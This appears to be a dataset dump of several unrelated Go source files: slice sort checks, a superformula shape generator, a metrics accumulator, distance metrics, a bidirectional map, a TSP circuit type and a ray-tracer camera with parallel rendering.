func (s SliceValue) IsSorted(desc bool) bool {
	if !IsSlice(s.Value()) {
		return false
	}
	sliceValue := reflect.ValueOf(s.value)
	// Zero or one element is trivially sorted in either direction.
	if sliceValue.Len() <= 1 {
		return true
	}
	switch sliceType := s.value.(type) {
	case []int:
		if desc {
			sliceType = reverseInts(sliceType)
		}
		return sort.IntsAreSorted(sliceType)
	case []int32, []int64:
		// Widen to []int via reflection so sort.IntsAreSorted can be used.
		sliceLen := sliceValue.Len()
		intSlice := make([]int, 0, sliceLen)
		for i := 0; i < sliceLen; i++ {
			intSlice = append(intSlice, int(sliceValue.Index(i).Int()))
		}
		if desc {
			intSlice = reverseInts(intSlice)
		}
		return sort.IntsAreSorted(intSlice)
	case []float64:
		if desc {
			sliceType = reverseFloats(sliceType)
		}
		return sort.Float64sAreSorted(sliceType)
	case []string:
		if desc {
			sliceType = reverseStrings(sliceType)
		}
		return sort.StringsAreSorted(sliceType)
	case sort.Interface:
		if desc {
			// sort.Reverse wraps the interface; it does not mutate data.
			sliceType = sort.Reverse(sliceType)
		}
		return sort.IsSorted(sliceType)
	}
	return false
}
// reverseInts returns a reversed copy of ints.
// BUG FIX: the previous version reversed the slice in place, so a mere
// IsSorted(desc=true) check permanently reversed the caller's data. The
// input is now left untouched.
func reverseInts(ints []int) []int {
	out := make([]int, len(ints))
	for i, v := range ints {
		out[len(ints)-1-i] = v
	}
	return out
}
// reverseFloats returns a reversed copy of floats; the input is unchanged.
func reverseFloats(floats []float64) []float64 {
	out := make([]float64, len(floats))
	for i, v := range floats {
		out[len(floats)-1-i] = v
	}
	return out
}
// reverseStrings returns a reversed copy of strings; the input is unchanged.
func reverseStrings(strings []string) []string {
	out := make([]string, len(strings))
	for i, v := range strings {
		out[len(strings)-1-i] = v
	}
	return out
}
// Value returns the actual value of the structure.
func (s SliceValue) Value() interface{} {
return s.value
}
// NewSliceValue creates and returns a SliceValue struct initialed with the given value.
func NewSliceValue(value interface{}) SliceValue {
return SliceValue{value: value}
}
// IsSlice returns true if the given value is a slice, else false.
func IsSlice(value interface{}) bool {
return reflect.ValueOf(value).Kind() == reflect.Slice || reflect.ValueOf(value).Kind() == reflect.Array
} | internal/pkg/values/slice_value.go | 0.846387 | 0.631694 | slice_value.go | starcoder |
package synth
import (
"math"
)
// Form holds the 6 parameters needed for the superformula to
// create supershapes. Form uses the superformula to generate
// points in both 2D and 3D. See:
// https://en.wikipedia.org/wiki/Superformula
// http://paulbourke.net/geometry/supershape/
type Form struct {
	M  float64 // Angle multiplier
	N1 float64 // Overall exponent.
	N2 float64 // Cos exponent.
	N3 float64 // Sin exponent.
	A  float64 // Cos divisor
	B  float64 // Sin divisor
}
// CircleForm is the default state of a super formula whose
// shape is a 2D circle or 3D sphere with values 0,1,1,1,1,1.
// Not expected to be changed.
var CircleForm = &Form{M: 0, N1: 1, N2: 1, N3: 1, A: 1, B: 1}
// NewForm creates a supershape at its default circle/sphere shape.
func NewForm() *Form {
	return &Form{M: 0, N1: 1, N2: 1, N3: 1, A: 1, B: 1}
}
// SetValues sets the superform to the given values.
func (f *Form) SetValues(m, n1, n2, n3, a, b float64) {
	f.M, f.N1, f.N2, f.N3, f.A, f.B = m, n1, n2, n3, a, b
}
// Set copies the parameters of fm into f.
func (f *Form) Set(fm *Form) {
	f.M, f.N1, f.N2, f.N3, f.A, f.B = fm.M, fm.N1, fm.N2, fm.N3, fm.A, fm.B
}
// Radius evaluates the superformula for the given angle in radians:
//
//	r(angle) = (|cos(M*angle/4)/A|^N2 + |sin(M*angle/4)/B|^N3) ^ (-1/N1)
//
// Returns 0 instead of +Inf when the inner term evaluates to zero.
// (Cleanup: the previous version declared a named result r it never used
// and tested zero via the redundant math.Abs(radius) == 0.)
func (f *Form) Radius(angle float64) float64 {
	t1 := math.Pow(math.Abs(math.Cos(f.M*angle/4)/f.A), f.N2)
	t2 := math.Pow(math.Abs(math.Sin(f.M*angle/4)/f.B), f.N3)
	r := math.Pow(t1+t2, 1/f.N1)
	if r == 0 {
		// Guard against dividing by zero below.
		return 0
	}
	return 1 / r
}
// At2D returns the 2D point for a given angle in radians.
func (f *Form) At2D(angle float64) (x, y float64) {
	radius := f.Radius(angle)
	x = radius * math.Cos(angle)
	y = radius * math.Sin(angle)
	return x, y
}
// At3D returns the 3D point for the supplied lat and lon angles in radians.
// lat is the angle in radians between Pi/2 and -Pi/2.
// lon is the angle in radians between Pi and -Pi.
func (f *Form) At3D(lat, lon float64) (x, y, z float64) {
	r1 := f.Radius(lon)
	r2 := f.Radius(lat)
	x = r1 * math.Cos(lon) * r2 * math.Cos(lat)
	y = r1 * math.Sin(lon) * r2 * math.Cos(lat)
	z = r2 * math.Sin(lat)
	return x, y, z
}
package internal
import (
"time"
"github.com/influxdata/telegraf"
)
// Measurement is one captured metric: its name, field values, tags, and
// the (possibly empty) list of explicit timestamps it was recorded with.
type Measurement struct {
	Name   string
	Fields map[string]interface{}
	Tags   map[string]string
	T      []time.Time
}
// StoreAccumulator store in memory all value pushed by AddFields, AddGauge...
// All type (fields, gague, counter) are processed the same, and can't be distinguished.
type StoreAccumulator struct {
	Measurement []Measurement // metrics captured so far, in arrival order
	Errors      []error       // errors reported via AddError, in arrival order
}
// Send forwards all captured measurements to acc using acc.AddFields, and
// forwards all captured errors using acc.AddError. Note that the original
// metric type (gauge/counter/...) is not preserved: everything is replayed
// as fields.
func (a *StoreAccumulator) Send(acc telegraf.Accumulator) {
	for _, m := range a.Measurement {
		acc.AddFields(m.Name, m.Fields, m.Tags, m.T...)
	}
	for _, err := range a.Errors {
		acc.AddError(err)
	}
}
// processMetrics records one measurement in memory; shared by every Add*
// method, which is why metric types cannot be distinguished later.
func (a *StoreAccumulator) processMetrics(measurement string, fields map[string]interface{}, tags map[string]string, t ...time.Time) {
	a.Measurement = append(a.Measurement, Measurement{
		Name:   measurement,
		Fields: fields,
		Tags:   tags,
		T:      t,
	})
}
// AddFields adds a metric to the accumulator with the given measurement
// name, fields, and tags (and timestamp). If a timestamp is not provided,
// then the accumulator sets it to "now".
func (a *StoreAccumulator) AddFields(measurement string, fields map[string]interface{}, tags map[string]string, t ...time.Time) {
	a.processMetrics(measurement, fields, tags, t...)
}
// AddGauge is the same as AddFields, but will add the metric as a "Gauge" type.
// (The type distinction is not stored; see processMetrics.)
func (a *StoreAccumulator) AddGauge(measurement string, fields map[string]interface{}, tags map[string]string, t ...time.Time) {
	a.processMetrics(measurement, fields, tags, t...)
}
// AddCounter is the same as AddFields, but will add the metric as a "Counter" type.
// (The type distinction is not stored; see processMetrics.)
func (a *StoreAccumulator) AddCounter(measurement string, fields map[string]interface{}, tags map[string]string, t ...time.Time) {
	a.processMetrics(measurement, fields, tags, t...)
}
// AddSummary is the same as AddFields, but will add the metric as a "Summary" type.
// (The type distinction is not stored; see processMetrics.)
func (a *StoreAccumulator) AddSummary(measurement string, fields map[string]interface{}, tags map[string]string, t ...time.Time) {
	a.processMetrics(measurement, fields, tags, t...)
}
// AddHistogram is the same as AddFields, but will add the metric as a "Histogram" type.
// (The type distinction is not stored; see processMetrics.)
func (a *StoreAccumulator) AddHistogram(measurement string, fields map[string]interface{}, tags map[string]string, t ...time.Time) {
	a.processMetrics(measurement, fields, tags, t...)
}
// AddMetric adds a metric to the accumulator. Not implemented: it only
// records errNotImplemented (defined elsewhere in this package).
func (a *StoreAccumulator) AddMetric(telegraf.Metric) {
	a.AddError(errNotImplemented)
}
// AddError reports an error by appending it to the Errors list.
func (a *StoreAccumulator) AddError(err error) {
	a.Errors = append(a.Errors, err)
}
// SetPrecision takes two time.Duration objects. If the first is non-zero,
// it sets that as the precision. Otherwise, it takes the second argument
// as the order of time that the metrics should be rounded to, with the
// maximum being 1s.
// Not implemented: every call records errNotImplemented.
func (a *StoreAccumulator) SetPrecision(precision time.Duration) {
	a.AddError(errNotImplemented)
}
// WithTracking upgrades to a TrackingAccumulator with space for maxTracked
// metrics/batches.
// Not implemented: records errNotImplemented and returns nil.
func (a *StoreAccumulator) WithTracking(maxTracked int) telegraf.TrackingAccumulator {
	a.AddError(errNotImplemented)
	return nil
} | inputs/internal/store_accumulator.go | 0.709523 | 0.431405 | store_accumulator.go | starcoder |
package distance
import (
"errors"
"math"
)
// DistMetric returns a function for calculating the distance between two vectors.
// Any entries that are zero in both vectors are ignored and vectors must be equal
// length. Supported metrics: "binary", "canberra", "jaccard", "manhattan",
// "maximum"; anything else (the default) is euclidean.
//
// BUG FIX: the binary/canberra/jaccard guards previously tested "x[i] > 0",
// silently treating negative entries as zero; they now test "x[i] != 0" to
// match the documented "non-zero"/"zero in both" contract.
func DistMetric(metric string) func(x []float64, y []float64) (dist float64, err error) {
	switch metric {
	case "binary":
		return binaryDist
	case "canberra":
		return canberraDist
	case "jaccard":
		return jaccardDist
	case "manhattan":
		return manhattanDist
	case "maximum":
		return maximumDist
	}
	// Euclidean by default.
	return euclideanDist
}
// checkEqualLen returns an error unless x and y have the same length.
func checkEqualLen(x, y []float64) error {
	if len(x) != len(y) {
		return errors.New("Vectors for calculating distance must have equal length")
	}
	return nil
}
// binaryDist considers two non-zero values to be equivalent:
// 1 - (#positions non-zero in both) / (#positions non-zero in either).
func binaryDist(x []float64, y []float64) (dist float64, err error) {
	if err = checkEqualLen(x, y); err != nil {
		return
	}
	denominator := float64(0)
	numerator := float64(0)
	for i := range x {
		if x[i] != 0 && y[i] != 0 {
			numerator++
		}
		// Ignore i when both x[i] and y[i] are zero.
		if x[i] != 0 || y[i] != 0 {
			denominator++
		}
	}
	dist = 1 - (numerator / denominator)
	return
}
// canberraDist is a weighted version of manhattan: each term is the
// absolute difference normalized by the sum of absolute values.
func canberraDist(x []float64, y []float64) (dist float64, err error) {
	if err = checkEqualLen(x, y); err != nil {
		return
	}
	for i := range x {
		// Ignore i when both x[i] and y[i] are zero (avoids 0/0).
		if x[i] != 0 || y[i] != 0 {
			dist += math.Abs(x[i]-y[i]) / (math.Abs(x[i]) + math.Abs(y[i]))
		}
	}
	return
}
// jaccardDist is the generalized Jaccard distance:
// 1 - sum(min(x,y)) / sum(max(x,y)) over positions non-zero in either.
func jaccardDist(x []float64, y []float64) (dist float64, err error) {
	if err = checkEqualLen(x, y); err != nil {
		return
	}
	denominator := float64(0)
	numerator := float64(0)
	for i := range x {
		// Ignore i when both x[i] and y[i] are zero.
		if x[i] != 0 || y[i] != 0 {
			numerator += math.Min(x[i], y[i])
			denominator += math.Max(x[i], y[i])
		}
	}
	dist = 1 - (numerator / denominator)
	return
}
// manhattanDist sums the absolute differences of the elements.
func manhattanDist(x []float64, y []float64) (dist float64, err error) {
	if err = checkEqualLen(x, y); err != nil {
		return
	}
	for i := range x {
		dist += math.Abs(x[i] - y[i])
	}
	return
}
// maximumDist is the maximum absolute difference between elements
// (Chebyshev distance).
func maximumDist(x []float64, y []float64) (dist float64, err error) {
	if err = checkEqualLen(x, y); err != nil {
		return
	}
	for i := range x {
		if diff := math.Abs(x[i] - y[i]); diff > dist {
			dist = diff
		}
	}
	return
}
// euclideanDist is the standard L2 distance: sqrt(sum((x-y)^2)).
func euclideanDist(x []float64, y []float64) (dist float64, err error) {
	if err = checkEqualLen(x, y); err != nil {
		return
	}
	for i := range x {
		diff := x[i] - y[i]
		dist += diff * diff
	}
	dist = math.Sqrt(dist)
	return
}
package accumulator
import (
"context"
"sync"
"time"
)
// Accumulator stores data on an interval and allows you to access it.
// Increment* calls accumulate into a counter that RunOnce/Run snapshot
// into Samples every interval; the RWMutex guards all mutable fields.
type Accumulator struct {
	ctx context.Context
	sync.RWMutex
	Label string // used to identify the owner of an accumulator.
	Samples []*Sample // chronological snapshots, capped at storedSamples
	acc int64 // increments since the last snapshot
	total int64 // total number of increments ever.
	// Samples to store before being discarded.
	storedSamples int
	// Time between sampling from the accumulator.
	// 600 samples with an interval of 1 second will provide a 10 minute history.
	// 5760 with an interval of 15 seconds will provide a 1 day history.
	interval time.Duration
}
// Sample contains the time the sample was made and its value.
type Sample struct {
	Value    int64     `json:"value"`
	StoredAt time.Time `json:"stored_at"`
}
// Sum returns the total number of increments the Accumulator has ever seen.
// NOTE(review): ac.total is read here but no visible code path increments
// it — confirm whether IncrementBy should also add to total.
func (ac *Accumulator) Sum() int64 {
	ac.RLock()
	defer ac.RUnlock()
	return ac.total
}
// Increment increments the accumulator by 1.
func (ac *Accumulator) Increment() {
	ac.IncrementBy(1)
}
// IncrementBy increments the accumulator by a specified number.
func (ac *Accumulator) IncrementBy(acc int64) {
	ac.Lock()
	defer ac.Unlock()
	ac.acc += acc
}
// GetAllSamples returns all samples from the accumulator.
func (ac *Accumulator) GetAllSamples() *SampleGroup {
	// FIX: read ac.Samples under the read lock; it is appended to and
	// re-sliced concurrently by RunOnce.
	ac.RLock()
	defer ac.RUnlock()
	return &SampleGroup{
		Label:   ac.Label,
		Samples: ac.Samples,
	}
}
// GetLastSamples returns the last n samples from the accumulator (all of
// them when fewer than n are stored).
func (ac *Accumulator) GetLastSamples(n int) *SampleGroup {
	ac.RLock()
	defer ac.RUnlock()
	// FIX: len(ac.Samples) is now read under the lock; the old code
	// computed the index before locking, racing with concurrent RunOnce.
	index := len(ac.Samples) - n
	if index < 0 {
		index = 0
	}
	return &SampleGroup{
		Label:   ac.Label,
		Samples: ac.Samples[index:],
	}
}
// GetSamplesSince returns the samples stored after the specified time.
// Samples are stored in chronological order, so the result is the tail of
// the list starting at the first sample newer than t (empty when none is).
func (ac *Accumulator) GetSamplesSince(t time.Time) *SampleGroup {
	ac.RLock()
	defer ac.RUnlock()
	// BUG FIX: the old code indexed ac.Samples[len(ac.Samples)-index],
	// which is out of range on the first iteration (index == 0) and
	// panicked for any non-empty sample list. Scan forward instead.
	for i, sample := range ac.Samples {
		if sample.StoredAt.After(t) {
			return &SampleGroup{
				Label:   ac.Label,
				Samples: ac.Samples[i:],
			}
		}
	}
	// No stored sample is newer than t.
	return &SampleGroup{
		Label:   ac.Label,
		Samples: nil,
	}
}
// SampleGroup holds a group of samples together with the label of the
// accumulator they came from.
type SampleGroup struct {
	Label   string
	Samples []*Sample
}
// Sum returns the sum of all samples in a samplegroup object.
func (sg *SampleGroup) Sum() int64 {
	acc := int64(0)
	for _, sample := range sg.Samples {
		acc += sample.Value
	}
	return acc
}
// Avg returns the average of all samples in a samplegroup object.
// Note: returns NaN when the group is empty (0/0 in float64).
func (sg *SampleGroup) Avg() float64 {
	return float64(sg.Sum()) / float64(len(sg.Samples))
}
// Since returns a samplegroup with all samples after a specified time.
// Samples are chronological, so the result is the tail starting at the
// first sample newer than t (empty when none is). The receiver is not
// modified and its Label is carried over, consistent with GetSamplesSince.
func (sg *SampleGroup) Since(t time.Time) *SampleGroup {
	// BUG FIX: the old code indexed sg.Samples[len(sg.Samples)-index],
	// which is out of range at index 0 (guaranteed panic for non-empty
	// groups), mutated sg.Samples while iterating, and dropped the Label.
	for i, sample := range sg.Samples {
		if sample.StoredAt.After(t) {
			return &SampleGroup{
				Label:   sg.Label,
				Samples: sg.Samples[i:],
			}
		}
	}
	return &SampleGroup{
		Label:   sg.Label,
		Samples: nil,
	}
}
// RunOnce allows you to manually call the accumulator task in the event you already have a task running every interval.
// It snapshots the current counter into Samples with timestamp t, resets
// the counter, and drops the oldest samples beyond storedSamples.
func (ac *Accumulator) RunOnce(t time.Time) {
	ac.Lock()
	ac.Samples = append(ac.Samples, &Sample{
		Value:    ac.acc,
		StoredAt: t,
	})
	// Reset accumulator.
	ac.acc = 0
	// If we surpass the stored samples number, remove old samples.
	if len(ac.Samples) > ac.storedSamples {
		ac.Samples = ac.Samples[len(ac.Samples)-ac.storedSamples:]
	}
	ac.Unlock()
}
// Run starts the accumulator which will process the accumulator and store it appropriately.
// It blocks until the accumulator's context is cancelled, sampling once per
// configured interval. The ticker is stopped on exit so its resources are
// released; the original leaked it.
func (ac *Accumulator) Run() {
	t := time.NewTicker(ac.interval)
	defer t.Stop()
	for {
		select {
		case <-ac.ctx.Done():
			return
		case <-t.C:
		}
		ac.RunOnce(time.Now().UTC())
	}
}
// NewAccumulator creates an accumulator. This does not automatically call Run.
// storedSamples bounds how many samples RunOnce retains and pre-sizes the
// sample slice; interval is the sampling period used by Run. Label is left
// empty for the caller to set before use.
// NOTE(review): the context is stored in the struct (generally discouraged
// in Go); it is only consumed by Run's cancellation check.
func NewAccumulator(ctx context.Context, storedSamples int, interval time.Duration) *Accumulator {
	acc := &Accumulator{
		ctx:           ctx,
		RWMutex:       sync.RWMutex{},
		Label:         "",
		Samples:       make([]*Sample, 0, storedSamples),
		acc:           int64(0),
		storedSamples: storedSamples,
		interval:      interval,
	}
	return acc
} | pkg/accumulator/accumulator.go | 0.826362 | 0.413714 | accumulator.go | starcoder
package bimap
import "sync"
// BiMap is a bi-directional hashmap that is thread safe and supports immutability
type BiMap struct {
	s         sync.RWMutex
	immutable bool
	forward   map[interface{}]interface{}
	inverse   map[interface{}]interface{}
}

// NewBiMap returns a an empty, mutable, biMap
func NewBiMap() *BiMap {
	return &BiMap{forward: make(map[interface{}]interface{}), inverse: make(map[interface{}]interface{}), immutable: false}
}

// Insert puts a key and value into the BiMap, provided its mutable. Also creates the reverse mapping from value to key.
// The immutability check and both writes happen under a single write lock;
// the original checked the flag under a read lock and then re-acquired the
// write lock, so MakeImmutable could slip in between and be bypassed.
// Panics if the map has been made immutable.
func (b *BiMap) Insert(k interface{}, v interface{}) {
	b.s.Lock()
	defer b.s.Unlock()
	if b.immutable {
		panic("Cannot modify immutable map")
	}
	b.forward[k] = v
	b.inverse[v] = k
}

// Exists checks whether or not a key exists in the BiMap
func (b *BiMap) Exists(k interface{}) bool {
	b.s.RLock()
	defer b.s.RUnlock()
	_, ok := b.forward[k]
	return ok
}

// ExistsInverse checks whether or not a value exists in the BiMap
func (b *BiMap) ExistsInverse(k interface{}) bool {
	b.s.RLock()
	defer b.s.RUnlock()
	_, ok := b.inverse[k]
	return ok
}

// Get returns the value for a given key in the BiMap and whether or not the element was present.
// For a missing key the empty string is returned (kept for backward
// compatibility with the original API). The lookup is a single atomic read
// under the read lock; the original used two separate lock acquisitions
// (Exists, then read), allowing a concurrent Delete in between.
func (b *BiMap) Get(k interface{}) (interface{}, bool) {
	b.s.RLock()
	defer b.s.RUnlock()
	v, ok := b.forward[k]
	if !ok {
		return "", false
	}
	return v, true
}

// GetInverse returns the key for a given value in the BiMap and whether or not the element was present.
// See Get for the locking and not-found conventions.
func (b *BiMap) GetInverse(v interface{}) (interface{}, bool) {
	b.s.RLock()
	defer b.s.RUnlock()
	k, ok := b.inverse[v]
	if !ok {
		return "", false
	}
	return k, true
}

// Delete removes a key-value pair from the BiMap for a given key. Returns if the key doesn't exist
// The immutability check, existence check, and both deletions run under one
// write lock, removing the original's window between the checks and the
// mutation. Panics if the map has been made immutable.
func (b *BiMap) Delete(k interface{}) {
	b.s.Lock()
	defer b.s.Unlock()
	if b.immutable {
		panic("Cannot modify immutable map")
	}
	val, ok := b.forward[k]
	if !ok {
		return
	}
	delete(b.forward, k)
	delete(b.inverse, val)
}

// DeleteInverse removes a key-value pair from the BiMap for a given value. Returns if the value doesn't exist
// Panics if the map has been made immutable.
func (b *BiMap) DeleteInverse(v interface{}) {
	b.s.Lock()
	defer b.s.Unlock()
	if b.immutable {
		panic("Cannot modify immutable map")
	}
	key, ok := b.inverse[v]
	if !ok {
		return
	}
	delete(b.inverse, v)
	delete(b.forward, key)
}

// Size returns the number of elements in the bimap
func (b *BiMap) Size() int {
	b.s.RLock()
	defer b.s.RUnlock()
	return len(b.forward)
}

// MakeImmutable freezes the BiMap preventing any further write actions from taking place
func (b *BiMap) MakeImmutable() {
	b.s.Lock()
	defer b.s.Unlock()
	b.immutable = true
}

// GetInverseMap returns a regular go map mapping from the BiMap's values to its keys
// NOTE(review): this returns the live internal map, not a copy — mutating
// it bypasses both the lock and the immutability flag.
func (b *BiMap) GetInverseMap() map[interface{}]interface{} {
	return b.inverse
}

// GetForwardMap returns a regular go map mapping from the BiMap's keys to its values
// NOTE(review): see GetInverseMap — this exposes internal state.
func (b *BiMap) GetForwardMap() map[interface{}]interface{} {
	return b.forward
}
// Lock manually locks the BiMap's mutex
// NOTE(review): exposing the raw mutex lets callers compose multi-step
// operations, but calling any of the self-locking methods while holding
// this lock will deadlock; use with care.
func (b *BiMap) Lock() {
	b.s.Lock()
}

// Unlock manually unlocks the BiMap's mutex
func (b *BiMap) Unlock() {
	b.s.Unlock()
} | bimap.go | 0.757346 | 0.508788 | bimap.go | starcoder
package circuit
import "github.com/heustis/tsp-solver-go/model"
// CompletedCircuit provides a no-op representation of a circuit, for use once an algorithm completes its computation.
// This allows for circuits with large memory requirements or circular references to be deleted without deleting the best computed circuit.
type CompletedCircuit struct {
	Circuit []model.CircuitVertex
	Length  float64
}

// NewCompletedCircuit returns a CompletedCircuit containing the result of the supplied Circuit.
// This will only account for vertices that are already attached to the circuit; any unattached vertices will be ignored.
func NewCompletedCircuit(c model.Circuit) *CompletedCircuit {
	return &CompletedCircuit{
		Circuit: c.GetAttachedVertices(),
		Length:  c.GetLength(),
	}
}

// CloneAndUpdate does nothing as the circuit is complete.
// The nil return tells callers there is no further clone to explore.
func (c *CompletedCircuit) CloneAndUpdate() ClonableCircuit {
	return nil
}

// Delete is implemented for compatibility with ClonableCircuit.
// It drops the vertex slice so its memory can be reclaimed.
func (c *CompletedCircuit) Delete() {
	c.Circuit = nil
}

// FindNextVertexAndEdge determines the next vertex to add to the circuit, along with which edge it should be added to.
// This returns (nil,nil) because the circuit is complete.
func (c *CompletedCircuit) FindNextVertexAndEdge() (model.CircuitVertex, model.CircuitEdge) {
	return nil, nil
}

// GetAttachedVertices returns all vertices that have been added to the circuit.
// This returns them in the order they should be traversed as part of the circuit.
func (c *CompletedCircuit) GetAttachedVertices() []model.CircuitVertex {
	return c.Circuit
}

// GetLength returns the length of the circuit.
func (c *CompletedCircuit) GetLength() float64 {
	return c.Length
}

// GetLengthWithNext returns the length of the circuit, since it is complete.
func (c *CompletedCircuit) GetLengthWithNext() float64 {
	return c.Length
}

// GetUnattachedVertices returns an empty map, since the circuit is complete.
func (c *CompletedCircuit) GetUnattachedVertices() map[model.CircuitVertex]bool {
	return make(map[model.CircuitVertex]bool)
}

// Update does nothing as the circuit is complete.
func (c *CompletedCircuit) Update(vertexToAdd model.CircuitVertex, edgeToSplit model.CircuitEdge) {
}

// Compile-time checks that CompletedCircuit satisfies both interfaces.
var _ ClonableCircuit = (*CompletedCircuit)(nil)
var _ model.Circuit = (*CompletedCircuit)(nil) | circuit/completed.go | 0.892234 | 0.640397 | completed.go | starcoder
package scene
import (
"math"
"sync"
"github.com/carlosroman/aun-otra-ray-tracer/go/internal/object"
"github.com/carlosroman/aun-otra-ray-tracer/go/internal/ray"
)
// NewCamera returns a camera whose view transform is computed from the
// observer position (from), the point being looked at (to), and the up
// vector (vup). The field of view is fixed at pi/2.
func NewCamera(hSize, vSize int, from, to, vup ray.Vector) (c Camera, err error) {
	return newCamera(hSize, vSize, math.Pi/2, ray.ViewTransform(from, to, vup))
}

// NewBasicCamera returns a camera with an identity view transform and the
// given field of view (in radians).
func NewBasicCamera(hSize, vSize int, fieldOfView float64) (c Camera, err error) {
	return newCamera(hSize, vSize, fieldOfView, ray.IdentityMatrix(4, 4))
}

// newCamera builds the concrete camera value, precomputing the pixel size,
// canvas half-extents, and the inverse of the view transform.
// NOTE(review): the error from transform.Inverse() is returned together
// with a constructed camera — callers must check err before using c.
func newCamera(hSize, vSize int, fieldOfView float64, transform ray.Matrix) (c Camera, err error) {
	pixelSize, halfWidth, halfHeight := calculatePixelSize(hSize, vSize, fieldOfView)
	inverse, err := transform.Inverse()
	return &camera{
		hSize:            hSize,
		vSize:            vSize,
		fieldOfView:      fieldOfView,
		origin:           ray.NewPoint(0, 0, 0),
		focalLength:      1.0,
		transform:        transform,
		transformInverse: inverse,
		pixelSize:        pixelSize,
		halfWidth:        halfWidth,
		halfHeight:       halfHeight,
	}, err
}

// Camera describes a positionable pinhole camera that can generate rays
// through canvas pixels.
type Camera interface {
	HSize() int
	VSize() int
	Origin() ray.Vector
	PixelSize() float64
	FocalLength() float64
	RayForPixel(nx, ny float64) ray.Ray
	FieldOfView() float64
	SetTransform(by ray.Matrix) error
}

// camera is the default Camera implementation. It caches the inverse of
// its view transform and the precomputed pixel/canvas dimensions.
type camera struct {
	hSize            int
	vSize            int
	fieldOfView      float64
	focalLength      float64
	origin           ray.Vector
	transform        ray.Matrix
	transformInverse ray.Matrix
	pixelSize        float64
	halfWidth        float64
	halfHeight       float64
}

// HSize returns the horizontal size of the canvas in pixels.
func (c camera) HSize() int {
	return c.hSize
}

// VSize returns the vertical size of the canvas in pixels.
func (c camera) VSize() int {
	return c.vSize
}

// FocalLength returns the distance from the camera origin to the canvas.
func (c camera) FocalLength() float64 {
	return c.focalLength
}

// FieldOfView returns the camera's field of view in radians.
func (c camera) FieldOfView() float64 {
	return c.fieldOfView
}
// calculatePixelSize derives the world-space size of a single canvas pixel
// together with the half-extents of the canvas, given the image dimensions
// and the field of view. The wider canvas axis spans tan(fieldOfView/2)
// world units from the center; the other axis is scaled by the aspect
// ratio.
func calculatePixelSize(hSize, vSize int, fieldOfView float64) (pixelSize, halfWidth, halfHeight float64) {
	halfView := math.Tan(fieldOfView / 2)
	aspect := float64(hSize) / float64(vSize)
	switch {
	case aspect >= 1:
		// Landscape (or square): the width drives the view extent.
		halfWidth, halfHeight = halfView, halfView/aspect
	default:
		// Portrait: the height drives the view extent.
		halfWidth, halfHeight = halfView*aspect, halfView
	}
	pixelSize = halfWidth * 2 / float64(hSize)
	return pixelSize, halfWidth, halfHeight
}
// PixelSize returns the world-space size of a single canvas pixel.
func (c camera) PixelSize() float64 {
	return c.pixelSize
}

// SetTransform replaces the camera's view transform and recomputes its
// cached inverse.
// NOTE(review): the new transform is kept even when inversion fails, so a
// non-nil error leaves the camera in a partially-updated state; callers
// must treat the error as fatal.
func (c *camera) SetTransform(by ray.Matrix) error {
	c.transform = by
	inverse, err := by.Inverse()
	c.transformInverse = inverse
	return err
}

// RayForPixel returns the world-space ray that passes through the center
// of canvas pixel (nx, ny).
func (c camera) RayForPixel(nx, ny float64) ray.Ray {
	// the offset from the edge of the canvas to the pixel's center
	xOffset := (nx + 0.5) * c.pixelSize
	yOffset := (ny + 0.5) * c.pixelSize
	// the untransformed coordinates of the pixel in world space.
	// (remember that the camera looks toward -z, so +x is to the *left*.)
	worldX := c.halfWidth - xOffset
	worldY := c.halfHeight - yOffset
	// using the camera matrix, transform the canvas point and the origin
	// and then compute the ray's direction vector.
	// (remember that the canvas is at z=-1)
	// pixel ← inverse(camera.transform) * point(world_x, world_y, -1)
	inv := c.transformInverse
	pixel := inv.MultiplyByVector(ray.NewPoint(worldX, worldY, -c.focalLength))
	origin := inv.MultiplyByVector(c.origin)
	// lower_left_corner = origin - horizontal/2 - vertical/2 - vec3(0, 0, focal_length)
	// lower_left_corner + u*horizontal + v*vertical - origin
	// direction ← normalize(pixel - origin)
	direction := pixel.Subtract(origin).Normalize()
	return ray.NewRayAt(origin, direction)
}

// Origin returns the camera's untransformed position (the world origin;
// the view transform is applied in RayForPixel).
func (c camera) Origin() ray.Vector {
	return c.origin
}
// MultiThreadedRender renders the world through the camera using a pool of
// worker goroutines.
//
// Pixel coordinates are fanned out on calcCh, noOfWorkers goroutines trace
// the rays, and a single collector goroutine writes the resulting colors
// into the canvas, so the canvas is never written concurrently. Completion
// is guaranteed by workersWg plus the done channel: every worker finishes
// its sends before workersWg.Wait returns, the collector drains ch until it
// is closed, then signals done.
//
// The original additionally maintained a canvasWg WaitGroup whose count
// never balanced (it was sized HSize*VSize while only
// (HSize-1)*(VSize-1) pixels are rendered) and which was never waited on,
// plus an unused cl constant; both pieces of dead bookkeeping have been
// removed.
//
// NOTE(review): the loops stop at VSize()-1 / HSize()-1, leaving the last
// row and column unrendered. This mirrors Render and is preserved here;
// confirm whether it is intentional.
func MultiThreadedRender(c Camera, w World, noOfWorkers, queueSize int) Canvas {
	canvas := NewCanvas(c.HSize(), c.VSize())
	type result struct {
		color object.RGB
		x, y  int
	}
	ch := make(chan result, queueSize)
	calcCh := make(chan result, queueSize)
	done := make(chan bool)
	workersWg := sync.WaitGroup{}
	workersWg.Add(noOfWorkers)
	// Single collector: the only goroutine that touches the canvas.
	go func() {
		for out := range ch {
			canvas[out.x][out.y] = out.color
		}
		done <- true
	}()
	// Worker pool: trace one ray per queued pixel.
	for workers := 0; workers < noOfWorkers; workers++ {
		go func() {
			for res := range calcCh {
				r := c.RayForPixel(float64(res.x), float64(res.y))
				res.color = w.ColorAt(r, defaultRecursiveDepth)
				ch <- res
			}
			workersWg.Done()
		}()
	}
	for y := 0; y < c.VSize()-1; y++ {
		for x := 0; x < c.HSize()-1; x++ {
			calcCh <- result{x: x, y: y}
		}
	}
	close(calcCh)
	workersWg.Wait()
	close(ch)
	<-done
	close(done)
	return canvas
}
// Render renders the world through the camera on the calling goroutine.
//
// NOTE(review): the loops stop at VSize()-1 and HSize()-1, so the last row
// and last column of the canvas are never rendered — this looks like an
// off-by-one shared with MultiThreadedRender; confirm before changing.
// The cl constant is declared but never used.
func Render(c Camera, w World) Canvas {
	canvas := NewCanvas(c.HSize(), c.VSize())
	const cl = 255.99
	for y := 0; y < c.VSize()-1; y++ {
		for x := 0; x < c.HSize()-1; x++ {
			r := c.RayForPixel(float64(x), float64(y))
			canvas[x][y] = w.ColorAt(r, defaultRecursiveDepth)
		}
	}
	return canvas
}

// defaultRecursiveDepth bounds reflection/refraction recursion in ColorAt.
const (
	defaultRecursiveDepth = 5
) | go/internal/scene/camera.go | 0.813905 | 0.484136 | camera.go | starcoder
package gorm
import (
